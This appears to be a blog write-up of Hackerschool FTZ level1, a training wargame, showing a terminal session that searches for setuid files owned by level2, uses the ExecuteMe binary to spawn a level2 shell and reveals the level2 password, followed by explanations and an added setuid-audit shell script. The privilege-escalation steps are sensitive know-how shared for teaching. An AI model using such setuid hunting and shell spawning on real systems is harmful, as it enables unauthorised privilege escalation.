  • Hackerschool FTZ level1
    Information Security/Pwnable 2017. 12. 26. 14:56
    login as: level1
    level1@192.168.244.128's password:
    [level1@ftz level1]$ ls
    hint  public_html  tmp
    [level1@ftz level1]$ cd hint
    -bash: cd: hint: Not a directory
    [level1@ftz level1]$ clear
    [level1@ftz level1]$ ls
    hint  public_html  tmp
    [level1@ftz level1]$ cat hint
     
     
    level2 권한에 setuid가 걸린 파일을 찾는다.
     
     
    [level1@ftz level1]$ find / -user level2 -perm -4000
    find: /lost+found: Permission denied
    find: /boot/lost+found: Permission denied
    find: /proc/1/fd: Permission denied
    find: /proc/2/fd: Permission denied
    find: /proc/3/fd: Permission denied
    find: /proc/4/fd: Permission denied
    find: /proc/9/fd: Permission denied
    find: /proc/5/fd: Permission denied
    find: /proc/6/fd: Permission denied
    find: /proc/7/fd: Permission denied
    find: /proc/8/fd: Permission denied
    find: /proc/10/fd: Permission denied
    find: /proc/11/fd: Permission denied
    find: /proc/19/fd: Permission denied
    find: /proc/77/fd: Permission denied
    find: /proc/1165/fd: Permission denied
    find: /proc/1474/fd: Permission denied
    find: /proc/1530/fd: Permission denied
    find: /proc/1534/fd: Permission denied
    find: /proc/1552/fd: Permission denied
    find: /proc/1571/fd: Permission denied
    find: /proc/1638/fd: Permission denied
    find: /proc/1675/fd: Permission denied
    find: /proc/1709/fd: Permission denied
    find: /proc/1718/fd: Permission denied
    find: /proc/1728/fd: Permission denied
    find: /proc/1737/fd: Permission denied
    find: /proc/1746/fd: Permission denied
    find: /proc/1767/fd: Permission denied
    find: /proc/1782/fd: Permission denied
    find: /proc/1812/fd: Permission denied
    find: /proc/1824/fd: Permission denied
    find: /proc/.1825/fd: Permission denied
    find: /proc/.1826/fd: Permission denied
    find: /proc/.1827/fd: Permission denied
    find: /proc/.1828/fd: Permission denied
    find: /proc/.1829/fd: Permission denied
    find: /proc/.1830/fd: Permission denied
    find: /proc/.1831/fd: Permission denied
    find: /proc/.1832/fd: Permission denied
    find: /proc/1877/fd: Permission denied
    find: /proc/1878/fd: Permission denied
    find: /proc/1879/fd: Permission denied
    find: /proc/1880/fd: Permission denied
    find: /proc/1881/fd: Permission denied
    find: /proc/1882/fd: Permission denied
    find: /proc/1883/fd: Permission denied
    find: /proc/1884/fd: Permission denied
    find: /proc/2234/fd: Permission denied
    find: /proc/2236/fd: Permission denied
    find: /var/lib/slocate: Permission denied
    find: /var/lib/nfs/statd: Permission denied
    find: /var/lib/dav: Permission denied
    find: /var/lib/mysql/mysql: Permission denied
    find: /var/lib/mysql/test: Permission denied
    find: /var/lib/pgsql: Permission denied
    find: /var/log/httpd: Permission denied
    find: /var/log/squid: Permission denied
    find: /var/log/samba: Permission denied
    find: /var/cache/mod_ssl: Permission denied
    find: /var/cache/alchemist/printconf.rpm: Permission denied
    find: /var/cache/alchemist/printconf.local: Permission denied
    find: /var/run/sudo: Permission denied
    find: /var/spool/at: Permission denied
    find: /var/spool/clientmqueue: Permission denied
    find: /var/spool/mqueue: Permission denied
    find: /var/spool/cron: Permission denied
    find: /var/spool/squid: Permission denied
    find: /var/empty/sshd: Permission denied
    find: /var/tux: Permission denied
    find: /tmp/cgn5EpxN: Permission denied
    find: /etc/sysconfig/pgsql: Permission denied
    find: /etc/default: Permission denied
    find: /etc/httpd/conf/ssl.crl: Permission denied
    find: /etc/httpd/conf/ssl.crt: Permission denied
    find: /etc/httpd/conf/ssl.csr: Permission denied
    find: /etc/httpd/conf/ssl.key: Permission denied
    find: /etc/httpd/conf/ssl.prm: Permission denied
    find: /root: Permission denied
    find: /usr/share/ssl/CA: Permission denied
    /bin/ExecuteMe
    find: /home/clear: Permission denied
    find: /home/level10/program: Permission denied
    find: /home/level5/tmp: Permission denied
    find: /home/trainer1: Permission denied
    find: /home/trainer10: Permission denied
    find: /home/trainer2: Permission denied
    find: /home/trainer3: Permission denied
    find: /home/trainer4: Permission denied
    find: /home/trainer5: Permission denied
    find: /home/trainer6: Permission denied
    find: /home/trainer7: Permission denied
    find: /home/trainer8: Permission denied
    find: /home/trainer9: Permission denied
    [level1@ftz level1]$ ls -al /bin/ExecuteMe
    -rwsr-x---    1 level2   level1      12868 Sep 10  2011 /bin/ExecuteMe
    [level1@ftz level1]$ file /bin/ExecuteMe
    /bin/ExecuteMe: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
    [level1@ftz level1]$ cd /bin
    [level1@ftz bin]$ ExecuteMe
     
     

                    레벨 2의 권한으로 당신이 원하는 명령어를
                    한가지 실행시켜 드리겠습니다.
                    (단, my-pass나 chmod는 제외)
     
                    어떤 명령을 실행시키겠습니까?
     
     
                    [level2@ftz level2]$ bash
     
     
    [level2@ftz level2]$ my-pass
     
    Level2 Password is "hacker or cracker". 

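    find / -user level2 -perm -4000 : Searches from the root directory for files that have the SetUID bit (4000) set and are owned by the user level2, that is, files that run by borrowing the privileges of their owner, level2.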
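
    The difference between `-perm -4000` (the form typed in the session) and `-perm 4000`, plus a way to narrow the result to setuid files that users other than the owner can run, as an added example that is not part of the original post. The function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): setuid audit with find.
# Function names and the sample tree are constructed for illustration.

# Setuid files under $1 owned by user $2. "-perm -4000" matches any mode that
# includes the setuid bit. find exits non-zero when a directory is unreadable,
# which is expected for an unprivileged scan, so errors are discarded.
find_setuid() {
    find "$1" -type f -user "$2" -perm -4000 2>/dev/null || true
}

# Same search with "-perm 4000": matches only a mode of exactly 4000, so a
# normal setuid binary such as mode 4750 is missed.
find_setuid_exact() {
    find "$1" -type f -user "$2" -perm 4000 2>/dev/null || true
}

# Setuid files that a user other than the owner may execute (group or other
# execute bit set): these lend the owner's privileges to someone else.
find_setuid_shared() {
    find "$1" -type f -user "$2" -perm -4000 \
        \( -perm -0010 -o -perm -0001 \) 2>/dev/null || true
}

# Build a constructed sample tree and print its path.
make_sample_tree() {
    d=$(mktemp -d) || return 1
    touch "$d/shared" "$d/private" "$d/plain"
    chmod 4750 "$d/shared"     # same mode as /bin/ExecuteMe (-rwsr-x---)
    chmod 4700 "$d/private"    # setuid, runnable by the owner only
    chmod 0755 "$d/plain"      # no setuid bit
    mkdir "$d/locked" && chmod 000 "$d/locked"   # triggers "Permission denied"
    printf '%s\n' "$d"
}

tree=$(make_sample_tree)
uid=$(id -u)                   # find -user also accepts a numeric user ID
echo "-perm -4000:";        find_setuid "$tree" "$uid"
echo "-perm 4000:";         find_setuid_exact "$tree" "$uid"
echo "runnable by others:"; find_setuid_shared "$tree" "$uid"
chmod 700 "$tree/locked" && rm -rf "$tree"
```

    Redirecting stderr with `2>/dev/null` also removes the long run of "Permission denied" lines seen in the session, leaving only the matching paths.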

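    file : A command that identifies a file's type.

    shell: A program that provides an interface which interprets the commands a user enters and runs them on the user's behalf.

    When the bash command is run with level2's privileges, a shell with level2's privileges is laid over the existing shell with level1's privileges, and privileges are escalated.

    That is, the level1 shell could only run commands within the privileges of the user level1, but by obtaining a level2 shell, it becomes possible to run commands and access files that require the privileges of the user level2.

    my-pass : A command that does not exist on real Linux systems and is found only on Hackerschool FTZ; for levelling up, it prints the password of the user whose shell is currently running.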

